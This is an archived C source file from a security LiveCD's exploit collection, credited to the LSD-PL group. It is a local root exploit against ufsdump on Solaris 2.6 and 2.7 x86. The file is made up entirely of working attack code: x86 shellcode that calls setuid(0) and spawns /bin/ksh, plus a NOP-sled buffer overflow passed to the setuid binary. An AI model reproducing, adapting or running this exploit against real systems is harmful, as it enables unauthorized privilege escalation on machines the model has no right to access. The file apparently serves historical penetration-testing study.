home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ufsdump.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  66 lines

---

1. /*## copyright LAST STAGE OF DELIRIUM apr 1998 poland        *://lsd-pl.net/ #*/
2. /*## /usr/lib/fs/ufs/ufsdump                                                 #*/
3.  
4. #define NOPNUM 3000
5. #define ADRNUM 2000
6. #define TMPNUM 2000
7. #define ALLIGN 2
8.  
9. char shellcode[]=
10.     "\x33\xc0"                     /* xorl   %eax,%eax             */
11.     "\xeb\x08"                     /* jmp    <shellcode+12>        */
12.     "\x5f"                         /* popl   %edi                  */
13.     "\x47"                         /* incl   %edi                  */
14.     "\xab"                         /* stosl  %eax,%es:(%edi)       */
15.     "\x88\x47\x01"                 /* movb   %al,0x1(%edi)         */
16.     "\xeb\x0d"                     /* jmp    <shellcode+25>        */
17.     "\xe8\xf3\xff\xff\xff"         /* call   <shellcode+4>         */
18.     "\x9a\xff\xff\xff\xff\x07\xff" /* lcall                        */
19.     "\xc3"                         /* ret                          */
20.     "\x33\xc0"                     /* xorl   %eax,%eax             */ 
21.     "\x50"                         /* pushl  %eax                  */
22.     "\xb0\x17"                     /* movb   $0x17,%al             */
23.     "\xe8\xee\xff\xff\xff"         /* call   <shellcode+17>        */
24.     "\xeb\x16"                     /* jmp    <shellcode+59>        */
25.     "\x33\xd2"                     /* xorl   %edx,%edx             */
26.     "\x58"                         /* popl   %eax                  */
27.     "\x8d\x78\x14"                 /* leal   0x14(%eax),edi        */
28.     "\x52"                         /* pushl  %edx                  */
29.     "\x57"                         /* pushl  %edi                  */
30.     "\x50"                         /* pushl  %eax                  */
31.     "\xab"                         /* stosl  %eax,%es:(%edi)       */
32.     "\x92"                         /* xchgl  %eax,%edx             */
33.     "\xab"                         /* stosl  %eax,%es:(%edi)       */
34.     "\x88\x42\x08"                 /* movb   %al,0x7(%edx)         */
35.     "\xb0\x3b"                     /* movb   $0x3b,%al             */
36.     "\xe8\xd6\xff\xff\xff"         /* call   <shellcode+17>        */
37.     "\xe8\xe5\xff\xff\xff"         /* call   <shellcode+37>        */
38.     "/bin/ksh"
39. ;
40.  
41. char jump[]=
42.     "\x8b\xc4"                     /* movl   %esp,%eax             */
43.     "\xc3"                         /* ret                          */
44. ;
45.  
46. main(int argc,char **argv){
47.     char buffer[10000],adr[4],tmp[4],*b;
48.     int i;
49.  
50.     printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland  //lsd-pl.net/\n");
51.     printf("/usr/lib/fs/ufs/ufsdump for solaris 2.6 2.7 x86\n\n");
52.  
53.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+3236+2000;
54.     *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+3236;
55.  
56.     b=buffer;
57.     for(i=0;i<3;i++) *b++=0xff;
58.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
59.     for(i=0;i<NOPNUM;i++) *b++=0x90;
60.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
61.     for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
62.     *b=0;
63.  
64.     execl("/usr/lib/fs/ufs/ufsdump","lsd","666",buffer,0);
65. }
66. /*                    www.hack.co.za           [9 August 2000]*/